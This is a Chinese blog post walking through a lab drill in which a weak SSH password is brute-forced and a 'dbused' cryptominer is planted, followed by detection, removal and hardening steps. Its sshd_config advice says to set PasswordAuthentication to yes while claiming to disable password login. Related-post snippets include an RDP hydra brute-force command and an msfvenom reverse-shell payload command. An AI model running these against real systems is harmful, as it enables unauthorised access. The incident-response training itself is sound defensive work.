Linux挖矿病毒事件应急响应演练(dbused木马)

已于 2022-06-10 15:00:47 修改
阅读量7.1k 收藏 34
点赞数 8
分类专栏: 应急演练篇 文章标签: 安全
于 2021-11-17 13:52:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42181573/article/details/121375921
版权

文章目录

1 环境准备

**攻击机**:kali(192.168.130.131)
**靶机**:Ubuntu(192.168.130.138)
**攻击方式**:SSH弱口令

2 攻击阶段

(1)通过端口扫描工具,对服务器进行端口探测尝试,发现开启了22端口;
在这里插入图片描述
(2)通过hydra工具暴力尝试破解用户名和密码,发现暴破成功,用户名为:root/root
在这里插入图片描述
(3)在攻击机上准备挖矿病毒
在这里插入图片描述(4)接下来进行攻击入侵,等待脚本运行
在这里插入图片描述

3 应急响应

3.1 检测阶段

(1)查看服务器系统整体运行情况,发现名为dbused的可疑进程大量占用系统CPU使用率
在这里插入图片描述(2)查看是否存在异常下载行为,发现wget和curl都存在异常行为
在这里插入图片描述(3)查看可疑进程所对应的文件路径,发现存在/tmp目录下
在这里插入图片描述
(4)查看异常网络连接状态,发现可疑IP:192.168.130.131进行SSH连接
在这里插入图片描述
(5)检查异常进程,发现都是root用户在运行
在这里插入图片描述
(6)将可疑dbused文件下载下来,上传到VirusTotal,如图所示,最终确定为挖矿病毒
在这里插入图片描述(7)查询特权用户和远程登录的账号信息,未发现可疑用户
在这里插入图片描述
(8)查看除root外的用户权限,未发现异常
在这里插入图片描述
(9)查看登录系统失败的用户,并在/var/log目录下查看btmp,发现可疑IP(192.168.130.131)进行大批SSH暴力破解:
在这里插入图片描述在这里插入图片描述(10)查看域名hosts,未发现异常
在这里插入图片描述
(11)查找最近24小时内修改过的文件
在这里插入图片描述
(12)查看历史命令
在这里插入图片描述
(13)查看驻留程序生成时间,最后一次改动时间为:2021-11-11 17:13:21
在这里插入图片描述
(14)查看服务器定时任务,在定时任务中也发现存在请求外部地址的恶意指令:
在这里插入图片描述(15)查看用户的登录行为,在~/.bash_profile文件发现了下面这一行异常代码
在这里插入图片描述(16)查询启动脚本的任务,发现五个可疑文件
在这里插入图片描述在这里插入图片描述
(17)依次查看rc.d、init.d、系统服务,共发现8个异常文件
find /etc/ -name ‘’ | xargs grep ‘dbuse’ |grep rc
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
find /etc/ -name '’ | xargs grep ‘dbuse’ |grep init.d
在这里插入图片描述
find /etc/ -name ‘*’ | xargs grep ‘dbuse’ |grep systemd
在这里插入图片描述
(18)查看/tmp目录,共发现4个异常文件
在这里插入图片描述
(19)检查/etc/ld.so.preload(该文件默认为空),未发现异常的动态链接库
在这里插入图片描述
(20)访问定时任务中可疑链接,下载xms文件进行分析
在这里插入图片描述

3.2 根除阶段

(1)通过检查阶段可发现,导致挖矿病毒产生的原因为攻击者暴力破解了SSH密码,通过SSH连接传入挖矿病毒。
(2)修改弱密码,增加密码复杂度
在这里插入图片描述
(3)修改/etc/hosts文件,确保可疑地址不被解析
在这里插入图片描述
(4)杀掉进程
在这里插入图片描述
(5)删除恶意程序文件(程序文件采用了附加属性a i,无法直接rm删除,需使用chattr命令去除附加属性后rm删除)
在这里插入图片描述在这里插入图片描述
(6)删除启动脚本的可疑任务文件(程序文件采用了附加属性a i,无法直接rm删除,需使用chattr命令去除附加属性后rm删除)
在这里插入图片描述在这里插入图片描述在这里插入图片描述
(7)清理定时任务/var/spool/cron/crontabs/root /var/spool/cron/crontabs/root(程序文件采用了附加属性a i,无法直接rm删除,需使用chattr命令去除附加属性后rm删除)

在这里插入图片描述
(8)重新启动服务器,发现未出现异常行为
在这里插入图片描述(9)修复漏洞

1)设置密码通常遵循以下原则:
	不使用空口令或系统缺省的口令,这些口令众所周之,为典型的弱口令;
	口令长度不小于8个字符;
	口令不应该为连续的某个字符(例如:AAAAAAAA)或重复某些字符的组合(例如:tzf.tzf.);
	口令应该为以下四类字符的组合,大写字母(A-Z)、小写字母(a-z)、数字(0-9)和特殊字符。每类字符至少包含一个。
	至少90天内更换一次口令,防止未被发现的入侵者继续使用该口令。
2)修改/etc/ssh/sshd_config,将PasswordAuthentication no改为yes并去除注释。在服务器上针对ssh服务启用公钥登录,禁用密码登录;
3)定期检查各远程办公机构PC客户端安全软件安装情况及病毒库更新情况,确保每台主机安全防护是有效可用的;
4)要求各远程办公部门定期对PC进行杀毒。
Li-D
关注
  • 8
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
一次应急演练挖矿病毒的练习笔记
qq_57966839的博客
03-12 1421
挖矿病毒练习笔记,蓝队思路
应急响应——Linux挖矿木马处置
记录并分享学习安全的知识点..
12-01 755
挖矿会带来大量的计算资源消耗,成本过于高昂,这就使一些不法分子通过各种手段将矿机程序植入到受害者的计算机中,利用受害者的计算机资源进行计算,从而获取非法收益。挖矿木马为了使用更多的计算资源,一般会通过对全网进行漏洞扫描、SSH爆破等攻击手段。部分挖矿木马具有横向传播的特点,会在成功入侵一台主机后,对处在同一个内网的其他主机进行横向渗透,以此来获得长期巨大而计算资源。
挖矿病毒应急响应思路,挖矿病毒事件处理步骤
最新发布
韩束一叶子
05-06 821
比特币系统每隔一段时间就会在节点上生成一个「随机代码」,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而「寻找代码」的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的「哈希运算」,CPU通常会被顶到100%。为了「降低成本」,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿
libgcc_a挖矿木马应急响应及分析
weixin_40642404的博客
05-19 2554
libgcc_a挖矿木马应急响应及分析
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程
Ryan2k的博客
02-26 8590
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程 现象描述 今天通过密钥以普通用户tung的身份登录远程Cent OS服务器时,连接出现非常严重的卡顿,进入后发现CPU被名为dbused的进程占满了! reboot重启服务器之后,以root身份登录服务器,发现cpu是正常的。使用top命令查看,dbused并没有运行,但是时不时出现tung用户的bash进程和wget命令会运行。并没有登录tung用户,该用户的命令却时不时运行,这让我感到很奇怪。 此时登录tung用户后,dbused便立
网络安全演练(一句话木马
侯刚的博客
10-31 563
渗透测试演示,一句话木马获取操作系统权限,php网站渗透测试
记一次挖矿病毒应急响应
weixin_45885440的博客
03-30 2472
记一次挖矿病毒应急响应
Linux 应急响应流程及实战演练.docx
06-10
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络...针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。
Linux应急响应流程及实战演练.docx
03-06
Linux 应急响应流程及实战演练 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,...
Linux应急响应流程及实战演练
02-03
Linux应急响应流程及实战演练,有需要的可以仔细阅读,里面的流程很详细,很不错!
2021年网络安全事件应急响应演练方案V1_20210416.doc
08-12
2021年网络安全事件应急响应演练方案V1_20210416.doc
网络安全事件应急演练资料合集.zip
07-06
网络安全事件应急演练指南 HW2021-攻防演练应急预案 证券期货业网络安全事件应急演练指南 安全应急演练服务技术白皮书 网络及支撑系统应急响应演练方案doc 信息安全应急演练方案模板 厂商网络攻防演练平台介绍 攻防...
挖矿病毒/远控木马排查思路(Windows系统)
qq_51845659的博客
03-18 1533
挖矿病毒/远控木马排查思路(NOP Team团队发布的《Windows应急响应手册》学习笔记)
应急响应实战笔记——Linux实战篇:③ 挖矿病毒
君逍遥o
04-10 859
随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式。新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue)、web攻击多种漏洞(如Tomcat弱口令攻击、Weblogic WLS组件漏洞、Jboss反序列化漏洞、Struts2远程命令执行等),导致大量服务器被感染挖矿程序的现象。
挖矿病毒常见处置方法
weixin_46597076的博客
02-24 4562
挖矿病毒特征:“挖矿病毒是一段恶意代码或者一个软件,一般利用主机或者操作系统的高危漏洞术在局域网内传播,控制电脑进行大量的计算机运算来获取虚拟货币。该病毒会消耗大量的计算机处理资源,常见的就是系统中毒后系统CPU占用接近100%、系统卡顿执行基本命令响应缓慢、系统出现异常进程无法正常kill、系统内存异常占用不稳定等。常见攻击方式:不明邮件附件、文件、连接和网页、不明U盘随意接入、非官方软件和服务器弱口令、高危端口暴露等事件大概处置流程:详细流程、操作命令。
应急响应实战之木马实战
qq_52074678的博客
05-09 2047
一.应急响应流程回顾 二.木马攻击模拟实验 (特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.) 1.环境介绍 攻击机 kali: 下载地址 被攻击机(注意关闭防火墙) win10: 下载地址: 木马脚本源码 msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
(虚假的应急响应)记一次我云服务器中了挖矿病毒kdevtmpfsi的经历
daxi0ng的博客
10-20 696
1、话说在我10.16号搭建solr复现CVE-2020-13957的时候,为了图省事直接在我的vps本地搭建了一下。 2、今天登陆vps发现,卧槽怎么100%占用,top一下。 好家伙,这是个啥。 3、我一搜发现是个挖矿病毒。赶紧搜一下怎么解决。 删除守护进程 ps -aux | grep kinsing 删除原进程 ps -aux | grep kdevtmpfsi 删除掉相关文件 cd /tmp rm -rf kdevtmpfsi rm -rf /var/tmp/ki
Linux应急响应挖矿
qq_42671480的博客
05-20 1125
Linux应急响应挖矿Linux服务器经常受到挖矿木马的骚扰,严重影响服务器的正常使用。那么安全人员遇到这类问题该如何解决呢? 首先了解一下什么是挖矿 每隔一个时间点,比特币系统会在系统节点上生成一个随机代码,互联网中的所有计算机都可以去寻找此代码,谁找到此代码,就会产生一个区块。而比特币的发行是基于奖励的,每促成一个区块的生成,该节点便获得相应奖励,这样大家就有动力投入资金去维护整个交易网...
勒索病毒应急演练
shy的博客
01-19 3548
扫描目标机开放端口,发现开启445和3389端口。 测试445端口是否存在永恒之蓝漏洞,发现存在ms17010漏洞,日后再打。 测试3389远程桌面是否存在弱口令,得到账号密码。 hydra -v -f -t 2 -w 2 -l Administrator -P E:\tools\git\Rdpscan\pass.txt rdp://192.168.5.128 利用得到的账号密码远程进行登录,并进行勒索病毒投放。 双击运行病毒,对该台服务器进行文件加密、勒索等操作。 攻击者到
linux操作系统的应急响应流程
08-17
### 回答1: Linux操作系统的应急响应流程通常包括以下步骤: 1. 识别威胁:监控系统日志和网络流量等,识别潜在的威胁。 2. 隔离系统:如果已经确认有攻击发生,需要隔离受感染的系统,以避免进一步的损害。 3. 收集取证:对受感染的系统进行取证工作,以保留现场证据。这通常包括收集系统日志、文件、进程等信息。 4. 分析威胁:对取证信息进行分析,确定攻击方式和入侵点,以便更好地制定应对措施。 5. 应对措施:根据威胁分析结果,采取相应的应对措施,例如修复漏洞、清除恶意软件、更新安全策略等。 6. 恢复系统:在确认系统已经清理干净并且不再存在威胁后,恢复系统功能,重新联网运行。 7. 总结反思:对应急响应过程进行总结和反思,以改进应急响应能力。 ### 回答2: Linux操作系统的应急响应流程主要包括以下几个步骤。 第一步,预防与准备。企业或组织应事先制定应急响应计划,并相应的培训和演练,以提高员工的应急响应能力。此外,建立网络监测与日志记录系统,及时发现安全事件的发生并进行记录。 第二步,检测与确认。当发生安全事件时,及时进行检测与确认,确定是否有安全漏洞或攻击行为。可以通过监测工具和安全设备来收集相关信息,如日志、网络活动、系统状态等。通过对异常行为的分析,来确认是否存在安全事件。 第三步,隔离与决策。一旦发现安全事件,需要迅速隔离受到攻击的系统或网络,以限制攻击的扩散和损害。同时,根据安全事件的严重性和影响范围,制定应对策略和详细的处置计划。 第四步,修复与恢复。在隔离受到攻击的系统或网络后,需要对其进行修复和恢复工作。首先,修复安全漏洞或弱点,关闭攻击所利用的入口。然后,恢复系统和网络的正常运行,包括恢复受损或被破坏的文件和数据。 第五步,调查与总结。对安全事件进行深入调查,找出攻击的来源和目的,以及造成攻击的原因。同时,对应急响应工作进行总结和评估,总结经验教训,提升应急响应能力和防护水平。 最后,应急响应流程需要不断的进行改进和优化,根据实际情况和新的安全威胁,及时进行调整和更新。通过有效的应急响应流程,可以减少安全事件对系统和网络的损害,并提高安全防护能力。 ### 回答3: Linux操作系统的应急响应流程主要包括以下几个步骤: 1. 确定应急响应团队:当发生安全事件时,首先需要确定一个专门的应急响应团队来处理该事件。该团队通常由安全专家、系统管理员、网络管理员等组成,他们应具备相关的技术知识和应急处理经验。 2. 收集证据:应急响应团队在第一时间需要收集证据,以分析和了解安全事件的性质和严重程度。这包括收集日志文件、备份关键数据、记录系统状态等。 3. 分析事件:基于收集到的证据,应急响应团队需要分析安全事件的来源、攻击方式和目标,以便进一步制定相应的应对策略。分析过程可能涉及到恶意代码分析、网络分析等技术手段。 4. 应对策略:根据分析结果,应急响应团队需要制定相应的应对策略,并采取措施限制攻击者的活动和恶意软件的传播。这可能涉及到修复系统漏洞、删除恶意代码、隔离受感染的计算机等。 5. 恢复与修复:在应对安全事件后,应急响应团队还需要进行系统的恢复与修复工作,以确保系统能够正常运行并且安全性得到提升。这可能包括更新操作系统和应用程序、修复系统漏洞、重新配置网络设备等。 6. 评估与改进:安全事件应急响应过程结束后,应急响应团队需要对整个过程进行评估和反思,以总结经验教训并进行改进。这有助于提高应急响应的效率和有效性,以应对未来的安全威胁。 总之,Linux操作系统的应急响应流程包括确定团队、收集证据、分析事件、制定应对策略、恢复与修复、评估与改进等步骤。这些步骤的目的是及时有效地应对安全事件,并提高系统的安全性和可用性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值